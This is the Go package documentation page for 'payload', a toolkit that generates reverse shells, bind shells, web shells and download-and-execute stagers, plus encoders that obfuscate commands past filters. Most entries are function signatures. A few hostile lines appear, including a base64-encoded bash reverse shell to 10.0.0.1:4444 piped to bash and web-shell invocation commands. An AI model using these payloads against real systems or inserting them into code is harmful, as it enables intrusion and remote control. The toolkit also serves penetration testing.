payload

package
v0.4.1 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Mar 3, 2026 License: AGPL-3.0 Imports: 7 Imported by: 0

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func ASPWebShell 

func ASPWebShell(param string) string

ASPWebShell returns a classic ASP web shell.

func ASPXWebShell 

func ASPXWebShell(param string) string

ASPXWebShell returns an ASPX web shell.

func Awk 

func Awk(lhost string, lport int) string

Awk returns an awk reverse shell.

func BackgroundExec 

func BackgroundExec(cmd string) string

BackgroundExec appends " &" to run in background.

func Base64Bash 

func Base64Bash(cmd string) string

Base64Bash wraps a command with base64 encoding + bash execution.

func Base64BashC 

func Base64BashC(cmd string) string

Base64BashC wraps a command using bash -c with base64 decoding.

func Base64Perl 

func Base64Perl(cmd string) string

Base64Perl wraps a command with base64 encoding + perl execution.

func Base64PowerShell 

func Base64PowerShell(cmd string) string

Base64PowerShell wraps a command with UTF-16LE base64 for powershell -enc.

func Base64Python 

func Base64Python(cmd string) string

Base64Python wraps a command with base64 encoding + python execution.

func Bash 

func Bash(lhost string, lport int) string

Bash returns a bash /dev/tcp reverse shell.

func BashFD 

func BashFD(lhost string, lport int) string

BashFD returns a compact bash reverse shell using file descriptors.

func BashMin 

func BashMin(lhost string, lport int) string

BashMin returns the shortest possible bash reverse shell (uses sh).

func BashReadLine 

func BashReadLine(lhost string, lport int) string

BashReadLine returns a bash reverse shell using readline for a cleaner shell.

func BashTLS 

func BashTLS(lhost string, lport int) string

BashTLS returns a bash reverse shell over TLS using openssl s_client.

func Bitsadmin 

func Bitsadmin(url, filename string) string

Bitsadmin returns a bitsadmin download-and-execute stager (Windows).

func Certutil 

func Certutil(url, filename string) string

Certutil returns a certutil download-and-execute stager (Windows).

func CommentTrail 

func CommentTrail(cmd string) string

CommentTrail appends " #" to neutralize trailing arguments.

func Curl 

func Curl(url, filename string) string

Curl returns a curl download-and-execute stager.

func CurlHTTP 

func CurlHTTP(lhost string, lport int) string

CurlHTTP returns a curl-based HTTP reverse shell (polling).

func CurlPipe 

func CurlPipe(url string) string

CurlPipe returns a curl pipe-to-bash stager.

func DoubleURLEncodeStr 

func DoubleURLEncodeStr(cmd string) string

DoubleURLEncodeStr applies double URL encoding to a string.

func HexBash 

func HexBash(cmd string) string

HexBash wraps a command with hex encoding + xxd bash execution.

func JSPWebShell 

func JSPWebShell(param string) string

JSPWebShell returns a minimal JSP web shell.

func Java 

func Java(lhost string, lport int) string

Java returns a Java Runtime reverse shell.

func Lua 

func Lua(lhost string, lport int) string

Lua returns a Lua reverse shell.

func Mshta 

func Mshta(url string) string

MshtaStager returns an mshta execution stager (Windows, .hta hosting required).

func Names added in v0.2.0 

func Names() []string

Names returns all registered payload names.

func NcatTLS 

func NcatTLS(lhost string, lport int) string

NcatTLS returns a ncat reverse shell over TLS.

func Netcat 

func Netcat(lhost string, lport int) string

Netcat returns a netcat reverse shell using -e flag.

func NetcatBind 

func NetcatBind(port int) string

NetcatBind starts a netcat bind shell on the given port.

func NetcatMkfifo 

func NetcatMkfifo(lhost string, lport int) string

NetcatMkfifo returns a netcat reverse shell using mkfifo (no -e needed).

func NetcatMkfifoBind 

func NetcatMkfifoBind(port int) string

NetcatMkfifoBind starts a mkfifo-based bind shell.

func NetcatOpenbsd 

func NetcatOpenbsd(lhost string, lport int) string

NetcatOpenbsd returns a netcat reverse shell for OpenBSD netcat (no -e).

func NodeJS 

func NodeJS(lhost string, lport int) string

NodeJS returns a Node.js reverse shell.

func NohupExec 

func NohupExec(cmd string) string

NohupExec wraps with nohup and output redirection.

func PHP 

func PHP(lhost string, lport int) string

PHP returns a PHP reverse shell one-liner.

func PHPBind 

func PHPBind(port int) string

PHPBind starts a PHP bind shell on the given port.

func PHPDownload 

func PHPDownload(url, filename string) string

PHPDownload returns a PHP download-and-execute stager.

func PHPEval 

func PHPEval(param string) string

PHPEval returns a PHP eval shell (POST parameter).

func PHPExec 

func PHPExec(lhost string, lport int) string

PHPExec returns a PHP reverse shell using proc_open.

func PHPHTTP 

func PHPHTTP(lhost string, lport int) string

PHPHTTP returns a PHP HTTP reverse shell (polling).

func PHPMin 

func PHPMin(lhost string, lport int) string

PHPMin returns a minimal PHP reverse shell.

func PHPWebShell 

func PHPWebShell(param string) string

PHPWebShell returns a minimal PHP web shell. Execute commands via: curl target/shell.php?cmd=id

func PHPWebShellPassthru 

func PHPWebShellPassthru(param string) string

PHPWebShellPassthru returns a PHP web shell using passthru for binary output.

func PHPWebShellPost 

func PHPWebShellPost(param string) string

PHPWebShellPost returns a PHP web shell that reads from POST body.

func PHPWebShellStealth 

func PHPWebShellStealth(header string) string

PHPWebShellStealth returns a PHP web shell hidden in a header. Execute commands via: curl -H "X-Cmd: id" target/shell.php

func Perl 

func Perl(lhost string, lport int) string

Perl returns a Perl reverse shell.

func PerlDownload 

func PerlDownload(url, filename string) string

PerlDownload returns a Perl download-and-execute stager.

func PipeChain 

func PipeChain(cmds ...string) string

PipeChain joins commands with pipes.

func PowerShell 

func PowerShell(lhost string, lport int) string

PowerShell returns a PowerShell reverse shell for Windows.

func PowerShellConPTY 

func PowerShellConPTY(lhost string, lport int) string

PowerShellConPTY returns a PowerShell reverse shell with ConPTY for full interactive shell.

func PowerShellDownload 

func PowerShellDownload(url, filename string) string

PowerShellDownload returns a PowerShell download-and-execute stager.

func PowerShellIEX 

func PowerShellIEX(url string) string

PowerShellIEX returns a PowerShell in-memory execution stager.

func Python 

func Python(lhost string, lport int) string

Python returns a Python3 reverse shell.

func PythonBind 

func PythonBind(port int) string

PythonBind starts a Python bind shell on the given port.

func PythonDownload 

func PythonDownload(url, filename string) string

PythonDownload returns a Python download-and-execute stager.

func PythonHTTP 

func PythonHTTP(lhost string, lport int) string

PythonHTTP returns a Python3 HTTP reverse shell (polling).

func PythonMin 

func PythonMin(lhost string, lport int) string

PythonMin returns a compact Python3 reverse shell.

func PythonPTY 

func PythonPTY(lhost string, lport int) string

PythonPTY returns a Python3 reverse shell with PTY allocation.

func PythonTLS 

func PythonTLS(lhost string, lport int) string

PythonTLS returns a Python3 reverse shell over TLS.

func Ruby 

func Ruby(lhost string, lport int) string

Ruby returns a Ruby reverse shell.

func SemicolonChain 

func SemicolonChain(cmds ...string) string

SemicolonChain joins commands with semicolons.

func Socat 

func Socat(lhost string, lport int) string

Socat returns a socat reverse shell with TTY.

func SocatBind 

func SocatBind(port int) string

SocatBind starts a socat bind shell with PTY on the given port.

func SocatTLS 

func SocatTLS(lhost string, lport int) string

SocatTLS returns a socat reverse shell over TLS with TTY.

func URLEncodeStr 

func URLEncodeStr(cmd string) string

URLEncodeStr applies URL encoding to a string.

func Wget 

func Wget(url, filename string) string

Wget returns a wget download-and-execute stager.

func WgetHTTP 

func WgetHTTP(lhost string, lport int) string

WgetHTTP returns a wget-based HTTP reverse shell (polling).

func WgetPipe 

func WgetPipe(url string) string

WgetPipe returns a wget pipe-to-bash stager.

func Wrap 

func Wrap(cmd string, enc Encoder, dec Decoder) string

Wrap is a generic encode+deliver shortcut.

Types

type Cmd 

type Cmd struct {
	// contains filtered or unexported fields
}

Cmd is a chainable payload builder. Create one with NewCmd, apply transforms, and call String() to get the final result. 

payload.NewCmd(payload.Bash("10.0.0.1", 4444)).
    Encode(Base64Enc).
    Deliver(BashDec).
    Trail().
    String()

// -> echo YmFzaC...MQ==|base64 -d|bash #

func NewCmd 

func NewCmd(raw string) *Cmd

NewCmd creates a new payload from a raw command string.

func (*Cmd) And 

func (c *Cmd) And(cmd string) *Cmd

And chains another command with &&.

func (*Cmd) Append 

func (c *Cmd) Append(s string) *Cmd

Append adds a suffix string.

func (*Cmd) Bg 

func (c *Cmd) Bg() *Cmd

Bg appends " &" to run in background.

func (*Cmd) BraceExpand 

func (c *Cmd) BraceExpand() *Cmd

BraceExpand rewrites "cmd arg" as "{cmd,arg}" for bash brace expansion.

func (*Cmd) Bytes 

func (c *Cmd) Bytes() []byte

Bytes returns the final payload as bytes.

func (*Cmd) Deliver 

func (c *Cmd) Deliver(dec Decoder) *Cmd

Deliver wraps the encoded payload with a decoder/executor.

func (*Cmd) DollarQuote 

func (c *Cmd) DollarQuote() *Cmd

DollarQuote converts the entire command to bash $'...' with hex escapes.

func (*Cmd) Encode 

func (c *Cmd) Encode(enc Encoder) *Cmd

Encode applies an encoding to the payload data.

func (*Cmd) IFS 

func (c *Cmd) IFS() *Cmd

IFS replaces spaces with ${IFS} for bash injection contexts where spaces are filtered.

func (*Cmd) Len 

func (c *Cmd) Len() int

Len returns the length of the current payload.

func (*Cmd) Nohup 

func (c *Cmd) Nohup() *Cmd

Nohup wraps the command with nohup and redirects output.

func (*Cmd) Pipe 

func (c *Cmd) Pipe(cmd string) *Cmd

Pipe chains another command with a pipe.

func (*Cmd) Prepend 

func (c *Cmd) Prepend(s string) *Cmd

Prepend adds a prefix string.

func (*Cmd) Quiet 

func (c *Cmd) Quiet() *Cmd

Quiet redirects stdout and stderr to /dev/null.

func (*Cmd) Semi 

func (c *Cmd) Semi(cmd string) *Cmd

Semi chains another command with a semicolon separator.

func (*Cmd) String 

func (c *Cmd) String() string

String returns the final payload string.

func (*Cmd) Tabs 

func (c *Cmd) Tabs() *Cmd

Tabs replaces spaces with tab characters.

func (*Cmd) Trail 

func (c *Cmd) Trail() *Cmd

Trail appends " #" to neutralize trailing arguments in injected contexts.

func (*Cmd) VarSplit 

func (c *Cmd) VarSplit() *Cmd

VarSplit obfuscates by splitting the command into shell variable assignments.

func (*Cmd) XOR 

func (c *Cmd) XOR(key []byte) *Cmd

XOR applies XOR encoding with a repeating key, then hex-encodes the result.

type Decoder 

type Decoder int
const (
	BashDec       Decoder = iota // echo <b64>|base64 -d|bash
	BashSubstDec                 // bash -c "$(echo <b64>|base64 -d)"
	HexBashDec                   // echo <hex>|xxd -r -p|bash
	GzipBashDec                  // echo <gz+b64>|base64 -d|gunzip|bash
	PythonDec                    // python3 -c "import base64,os;..."
	PerlDec                      // perl -MMIME::Base64 -e '...'
	PowerShellDec                // powershell -nop -enc <data>
	RubyDec                      // ruby -e "require 'base64';system(Base64.decode64('...'))"
	PHPDec                       // php -r "system(base64_decode('...'));"
)

type Encoder 

type Encoder int
const (
	Base64Enc     Encoder = iota // standard base64
	Base64URLEnc                 // URL-safe base64
	HexEnc                       // hex encoding
	URLEnc                       // percent encoding
	DoubleURLEnc                 // double percent encoding
	GzipBase64Enc                // gzip then base64
	UTF16LEEnc                   // UTF-16LE (for PowerShell -enc)
	OctalEnc                     // bash $'\NNN' octal escapes
	ROT13Enc                     // ROT13 substitution
)

type GenerateFunc 

type GenerateFunc func(lhost string, lport int) string

GenerateFunc is a function that generates a payload command string.

type Info 

type Info struct {
	Name        string
	Description string
	Platform    string // "linux", "windows"
	Generate    GenerateFunc
}

Info describes a registered payload.

func DefaultPayload 

func DefaultPayload(platform string) *Info

DefaultPayload returns the default payload for a platform.

func GetPayload 

func GetPayload(name string) *Info

GetPayload returns a payload by name, or nil if not found.

func ListForPlatform 

func ListForPlatform(platform string) []*Info

ListForPlatform returns payloads compatible with the given platform.

func ListPayloads 

func ListPayloads() []*Info

ListPayloads returns all registered payloads.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.